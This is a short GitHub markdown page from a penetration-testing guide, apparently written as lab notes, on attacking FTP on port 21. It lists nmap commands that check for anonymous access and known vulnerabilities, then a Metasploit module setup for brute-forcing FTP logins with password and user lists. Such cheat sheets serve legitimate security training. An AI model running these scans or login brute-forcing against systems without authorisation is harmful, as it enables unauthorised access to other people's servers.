Pen-Testing-Guide/FTP.md at master · tr0nucf/Pen-Testing-Guide · GitHub

17 lines (14 loc) · 366 Bytes

Port 21 - FTP

# Identify servers that allow anonymous access
nmap --script ftp-anon.nse 10.11.1.22 -p 21

# Identify any vulnerabilities
nmap --script vuln 10.11.1.22 -p 21

# Brute force with MSFConsole
msfconsole
use auxiliary/scanner/ftp/ftp-login
set PASS_FILE /root/password-file.txt
set USERPASS_FILE /root/users.txt
set RHOSTS <targetip>
run